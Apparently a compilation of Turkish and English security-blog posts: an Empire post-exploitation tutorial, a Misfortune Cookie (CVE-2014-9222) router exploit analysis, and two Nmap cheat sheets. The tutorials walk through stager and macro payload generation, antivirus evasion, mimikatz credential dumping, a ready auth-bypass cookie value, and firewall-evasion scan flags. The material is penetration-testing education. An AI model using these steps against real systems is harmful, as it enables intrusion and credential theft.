Empire, PowerShell ve Python kullanan bir post-exploitation aracıdır. Oldukça pratik ve gelişmiş özellikleri vardır. İçinde exploit bulunmamaktadır. Sadece payloadlar üretmekde ve listener bulundurmaktadır. Bunun haricinde sızma testinde post-exploitation aşamasında kullanılacak bir çok modül vardır. Powershell kullandığı için kurumlardaki antivirus gibi güvenlik yazılımlarına yakalanmadan işlem yapıp shell sağlayabilmektedir. Gelişmiş sosyal mühendislik saldırıları için macro payloadları üretebilmektedir.

Kurulum:

git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh

Kullanımı:

Genel yapı olarak listeners, stager ve  module  bulunmaktadır. Bunların parametrelerini set ve unset ile düzenleyip execute komutu ile çalıştırabilmekteyiz. Stager’i kullanabilmek için bir listener seçmeli ve onu çalıştırmalıyız. Parametre olarak listener istemektedir. Gelen bağlantıları agents yazarak görebilmekteyiz. help komutu ilede detaylı olarak tüm komutları görebilirsiniz.

Listener başlatmak için : uselistener http_com  diyerek seçilir. info http_com ile parametreler görülmektedir. set ve unset komutları ile parametreleri düzenledikten sonra execute komutu ile listener başlatılır.  Daha sonra listeners komutu ile listenerlar listenebilir.

Agents komutu ile gelen bağlantılar listenebilir. Default olarak kendi agenti bulunmaktadır.

listeners yazıp tab’a basarak tüm listenerları listeleyebiliriz. usestager yazıp tab’a bastığımızda kullanabileceğimiz tüm stagerları görebilmekteyiz. Burada powershell ile bir tane bat dosyası oluşturan  usestager windows/launcher_bat  komutu ile onu seçmekteyiz ve execute komutu ile çalıştırmaktayız. /tmp/launcher.bat adresinde oluşmuştur.

cat /tmp/launcher.bat  komutu ile dosyamızı görüntülüyoruz.

Bu dosyayı sisteme ister bat olarak yükleyip çalıştırabilirsiniz yada benim bu senaryoda file upload zafiyeti bulunan bir yazılıma cmd shell yükleyip web shell üzerinden direk çalıştırarak sistemden empire’a shell alabilirsiniz.

interact E2SPRAVT diyerek gelen bağlantımızdaki shellimize geçebilmekteyiz.

info komutu ile sistem hakkında bilgiler alınabilmektedir. shell yazıp istediğimiz cmd komutunuda çalıştırabilmekteyiz.

usemodule yazıp tab’a bastığımızda post-exploitation için kullanabileceğimiz bir çok modül gelmektedir. usemodule credentials/mimikatz/lsadump   komutu ile modulu seçip execute diyerek mimikatz modulünü çalıştırıyoruz.

Genel olarak Empire’ı kullanarak sistem üzerinden shell alıp post-exploitation modullerini kullandık. İç network tarafında metasploitin meterpreter bağlantılarının güvenlik yazılımları tarafından yakalanmasından dolayı power shell payloadları ile shell alınabilmektedir. Metasploit gibi gelişmiş bir framework değildir. İçinde exploit bulunmamaktadır.

Empire, sosyal mühendislik testleri için zararlı macro payloadı üretmektedir.  usestager windows/macro listener_adi komutu ile stagerı seçip execute  ile çalıştırıldığında /tmp/macro nun altında çalışmaktadır. Bu payloadı office yazılımlarına (word,excel) yapıştırıp karşı tarafta çalıştırıldığında listenerımıza bağlantı gelmektedir. Agents komutu ile gelen bağlantıları görüp interact ile geçiş yapılabilirsiniz.

TR | Empire Post Exploitation Araç Kurulumu ve Kullanımı Ahmet Gürel

Bu yazımızda sizlerle etki alanı oldukça geniş olan ve yüksek risk içeren bir zafiyeti inceleyeceğiz. Misfortune Cookie olarak adlandırılan zafiyet routerlarda web arayüzü sunmak için kullanılan Allegro Rompager adlı gömülü web server uygulamasında bulunuyor. Bu yazılımın birçok marka/model routerda kullanılması zafiyetin etki alanını bir hayli genişletiyor. Zafiyet aracılığıyla saldıgan herhangi bir şifreye ihtiyaç duymadan router’ın web kontrol paneline erişim sağlayabiliyor. Bu da zafiyeti oldukça riskli bir hale getiriyor. Hadi incelemeye başlayalım.

NOT: Yazıda kullanılan kod parçaları ve görseller alıntıdır.

0x00: Zafiyet Tespiti

Zafiyetimizin istismar vektörü, adından da anlaşılacağı gibi, cookie verisi. Gelin önce sunucuya gönderilen cookie değerine bir bakalım.

Gönderilen cookie’nin formatı “CX=value” şeklinde. Bunun sebebini web server’ın cookie’yi parse eden kısmına bakınca daha iyi anlıyoruz.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
 ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
 ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
 ROM:8010E5B8                 li      $a1, 0x3D
 ROM:8010E5BC                 addiu   $s0, 1
 ROM:8010E5C0                 move    $a0, $s0       
 ROM:8010E5C4                 jal     sub_8016C340
 ROM:8010E5C8                 nop
 ROM:8010E5CC                 move    $a0, $s0       
 ROM:8010E5D0                 move    $s1, $v0       
 ROM:8010E5D4                 addiu   $s1, 1
 ROM:8010E5D8                 jal     sub_801F2E74
 ROM:8010E5DC                 sb      $zero, -1($s1) 
 ROM:8010E5E0                 move    $a0, $s1       
 ROM:8010E5E4                 jal     sub_8016CA24
 ROM:8010E5E8                 move    $s3, $v0       
 ROM:8010E5EC                 li      $a2, 0x28
 ROM:8010E5F0                 mul     $t2, $s3, $a2   
 ROM:8010E5F4                 move    $a1, $s1       
 ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28
 ROM:8010E5FC                 move    $s0, $v0
 ROM:8010E600                 addu    $at, $s1, $s0   
 ROM:8010E604                 addu    $a0, $t5, $t2   
 ROM:8010E608                 jal     sub_8016A784
 ROM:8010E60C                 sb      $zero, 0($at)
 ROM:8010E610                 j       loc_8010E644   
 ROM:8010E614                 addu    $s0, $s1, $s0
 ROM:8010E618  # ---------------------------------------------------------------------------

Yukarıdaki MIPS Assembly kodlarını anlamakta sıkıntı çekiyorsanız (ben çektim) şu kaynaklara göz gezdirmenizi öneririm:

MIPS Quick Tutorial

MIPS Instruction Set

Burada yapılan işlemler özetle şu şekilde (“CX=value” formatını hatırlayın);

• Ilk karakter ‘C’ ye eşitmi?
• Evet ise => “X=value” olan kısmı al
• ‘=’ ayracı ile string’i iki kısıma ayır (“X” ve “value”)
• *(0x6B28 + X*0x28) = value

Son adım bana biyerden tanıdık geliyor..

• *(base_addr + i*sizeof(item)) = value

Bu pattern x86 mimarisinde de sıklıkla karşılaştığım dizi elemanlarına erişme pattern’i. (bkz: x86 Asm Cheat Sheet). Buradan anlaşılacağı üzere gönderdiğimiz cookie’ler, her elemanı 40 byte olan -nitekim cookie ile gönderilen değerimiz 40 karakter- bir dizide tutuluyor. Biz sunucuya “C0=blabla” şeklinde bir cookie gönderdiğimizde aslında cookie dizisinin 0. indexine “blabla” değerini yazmış oluyoruz. Uygulama girdiyi alırken herhangi bir sınır kontrolü yapmadığı içinde write-what-where durumu oluşuyor (yani istediğimiz adrese istediğimiz değeri yazabiliyoruz).

Zafiyeti tanımladığımıza göre şimdi istismarına geçelim.

0x10: Exploitation

ZynOS‘in zafiyeti istismar etmemizi kolaylaştıracak bir özelliği var; pswauthen. Komut arayüzünden bu komutu ‘0’ argümanıyla birlikte girdiğiniz takdirde geçici bir süre için web arayüzüne şifresiz erişim sağlayabiliyorsunuz. Komutun yaptığı şey ise belli bir adresteki flag değerini sıfıra eşitlemek. Daha sonradan Rompager bu adresteki değere bakıp 0’ı gördüğünde kullanıcıya şifresiz erişim sağlıyor. Bu da demek oluyor ki elimizdeki zafiyeti kullanarak bu adresin içerisini sıfırlayıp modem arayüzüne şifresiz şekilde erişebiliriz! Tek yapmamız gereken flag adresi ile dizinin adresi arasındaki farkı bulup 40’a bölmek ve bunu uygun cookie formatında yazıp request halinde sunucuya göndermek.

• 0x8034FF94 – 0x804163D4 = 0xFFF39BC0
• 0xFFF39BC0 / 0x28 = 0x0666171
• 0x06661718 = 107353880 (indis karşılığı)

Göndermemiz gereken cookie değeri: “C107353880=\0”

Cookie değeri null-byte içereceğinden request’i netcat ile göndermeniz gerekir.

Böylece zafiyetimizi istismar etmiş olduk.

Bu zafiyeti kullanan bir malware salgını hakkında yazdığım raporu buradan okuyabilirsiniz.

Kaynakça:

1. http://mis.fortunecook.ie/
2. http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
3. http://cawanblog.blogspot.com.tr/2015/02/misfortune-cookie-cve-2014-9222.html

TR | Misfortune Cookie (CVE-2014-9222) Analizi CanYouPwnMe

What is Nmap?

The software provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection, vulnerability detection, and other features. Nmap is also capable of adapting to network conditions including latency and congestion during a scan. Nmap is under development and refinement by its user community.

How to install Nmap?

In generally most linux deploy library have nmap so if you want use “sudo apt-get install nmap”  command or download the from nmap.org.

How to use Nmap?

• Basic Scanning Techniques

Scan a single target;

nmap [target]

Scan multiple targets;

nmap [target1, target2, target3…]

Scan a list of targets;

nmap –iL [target.txt]

Scan a range of hosts

nmap [target-50]

Excluding targets from a scan;

nmap [target] --exclude [dışlanacak target]

Excluding targets using a list;

nmap [target] --exclude [Dışlanacaktarget.txt]

Scan an IPv6 target;

nmap -6 [target]

Scan random hosts;

nmap -iR [target sayısı]

Scan top 100 port;

nmap -F [target]

Disable reverse DNS resolution;

nmap -n [target]

For scanning depth (T0-T5);

nmap -T4 [target]

• Discovery Options

Perform a ping scan only;

nmap -sP [target]

Perform a ping scan only and closing port scanning;

nmap -sn [target]

Don’t ping;

nmap -PN [target]

TCP SYN Ping;

nmap -PS [target]

TCP ACK Ping;

nmap -PA [target]

UDP Ping;

nmap -PU

ARP ping;

nmap -PR [target]

Create a host list;

nmap -SL

Disable DNS analysis;

nmap -n/-R [target]

Alternative DNS lookup;

nmap --system-dns [target]

Scan for port;

nmap -p [target]

Scan all ports;

nmap -p- [target]

Scan port ranges;

nmap -p 0-61

Perform a SYN scan only;

nmap -sS [target]

Perform a ACK scan only;

nmap -sA [target]

TCP window scan;

nmap -sW [target]

TCP scanning;

nmap -sT [target]

UDP scanning;

nmap -sU [target]

Detect OS;

nmap -O [target]

Detect OS and version analysis;

nmap -A [target]

Troubleshooting version scans;

nmap -sV [target]

ICMP echo ping;

nmap -PE [target]

• Firewall Evasion Techniques

Fragment packets;

nmap -f [target]

Spoof MAC Address;

nmap --spoof-mac [MAC|0|vendor] [target]

Specify a specific MTU;

nmap -MTU [MTUdeğeri] [target]

IP spoofing;

nmap -D Spooflananip [target]

Send bad checksums;

nmap --badsum [target]

Append random data;

nmap --data-length [boyut] [target]

• Nmap script kullanımı

Scan use to all scripts;

nmap -sC [target]

Use the starts “http” to scripts;

nmap --script "http*" [target]

Execute individual scripts;

nmap --script [scriptAdı] [target]

Execute scripts by category;

nmap --script [kategori] [target]

EN | Nmap Cheat Sheet Mustafa Kaan Demirhan

Nmap Nedir?

Nmap ağda işletim sistemi fark etmeksizin çalışan istemcilerin açık portlarını servis durumlarını işletim sistemlerini, sürüm bilgileri “etc/services” dosyasından aldığı port numarası ve sunucu servis listesiyle karşılaştırarak kullanıcıya sunar.

Nmap/Zenmap Kurulumu

Çoğu linux dağıtımında kendi kütüphanesinde bulunduğu için “sudo apt-get install nmap” komutu ile kurulumu yapabilirsiniz, yanıt alamazsanız nmap.org adresinden de kurulum yapabilirsiniz.
Windows ortamında kullanmak için zenmap kurulumu yapabilrsiniz.

Nmap Kullanımı

Kullanım için kendimize bir dizilim belirlersek;

nmap [tarama türü] [opsiyonlar] [hedef tanımlama]

• Port Tarama Sonuç İfadeleri;

Port açıksa;

Open

Port kapalıysa;

closed

Filtreleme var;

Filtered

ACK taramasında portlar erişilebilir fakat açık olmayada bilir;

Unfiltered

UDP, IP Protocol, FIN, NULL ve XMAS taramalarında portların açık veya filtreli olduğu tespit edilememiştir;

Open | Filtered

IDLE taraması için portların kapalı yada filtrelenmiş olduğu belirlenemedi ise;

Closed | Filtered

• Basit Tarama Parametreleri

Tek hedef taramak için;

nmap [hedef]

Çoklu hedef taramak için;

nmap [hedef1, hedef2, hedef3…]

Dosyadaki hedef listesini taramak için;

nmap –iL [hedef.txt]

IP aralığını taramak için;

nmap [hedef-50]

Taramadan hedef çıkartarak tarama yapmak için;

nmap [hedef] --exclude [dışlanacak hedef]

Taramadan dosyadaki hedef listesi çıkartarak tarama yapmak için;

nmap [hedef] --exclude [DışlanacakHedef.txt]

IPv6 taraması yapmak için;

nmap -6 [hedef]

Rastgele Hedef taraması için;

nmap -iR [hedef sayısı]

Hızlı tarama yapmak için (top 100 port);

nmap -F [hedef]

Hedefin DNS bilgisini öğrenmek için;

nmap -n [hedef]

Tarama hızı/derinliği belirlemek için (T0-T5);

nmap -T4 [hedef]

• Keşif Parametreleri

Sadece ping taraması için;

nmap -sP [hedef]

Ping taraması yaparken port taramasını kapatmak için;

nmap -sn [hedef]

Ping yollamadan tarama yapmak için(Ayakta olduğunu bildiğiniz halde yanıt alamadığımız makineler için önerilir);

nmap -PN [hedef]

TCP SYN Ping taraması için;

nmap -PS [hedef]

TCP ACK Ping taraması için;

nmap -PA [hedef]

UDP Ping taraması için;

nmap -PU

ARP ping taraması yapmak için;

nmap -PR [hedef]

Hedef listesi ve DNS isimlerini çıkartmak için;

nmap -SL

DNS çözümlemesi yapmadan tarama yapmak için;

nmap -n/-R [hedef]

İşletim sistemindeki DNS serverları kullanarak tarama için;

nmap -system-dns [hedef]

Port taraması yapmak için;

nmap -p [hedef]

Tüm portlarda tarama yapmak için;

nmap -p- [hedef]

Belli bir port aralığında tarama yapmak için;

nmap -p 0-61

SYN taraması yapmak için;

nmap -sS [hedef]

ACT taraması yapmak için;

nmap -sA [hedef]

Window taraması için;

nmap -sW [hedef]

TCP taraması için;

nmap -sT [hedef]

UDP taraması için;

nmap -sU [hedef]

Hedef de ki işletim sistemini öğrenmek için;

nmap -O [hedef]

İşletim sistemi ve versiyon analizi için;

nmap -A [hedef]

Açık portlar da ki çalışan servislerin sürümlerini öğrenmek için;

nmap -sV [hedef]

ICMP Echo Request paketleri ile tarama için;

nmap -PE [hedef]

• Güvenlik Duvarı / IDS  Takılmadan Tarama Yapmak İçin Parametreler

Fragment paket taraması;

nmap -f [hedef]

MAC adresi aldatması yaparak tarama için;

nmap --spoof-mac [MAC|0|vendor] [hedef]

Yem kullanarak tarama yapmak için;

nmap -D RND: [sayı] [hedef]

Manuel olarak MTU değeri atamak için;

nmap -MTU [MTUdeğeri] [hedef]

IP aldatması için;

nmap -D Spooflananip [hedef]

Hatalı checksum paketleri yollamak için;

nmap --badsum [hedef]

Paket boyutlarını ayarlamak için;

nmap --data-length [boyut] [hedef]

• Nmap script kullanımı

Tüm scriptler kullanarak yapılabilecek test için;

nmap -sC [hedef]

http ile başlayan scriptleri kullanmak için;

nmap --script "http*" [hedef]

Tek bir script ile tarama yapmak için;

nmap --script [scriptAdı] [hedef]

Bellirli bir kategorideki scriptleri kullanmak için;

nmap --script [kategori] [hedef]

TR | Nmap Cheat Sheet Mustafa Kaan Demirhan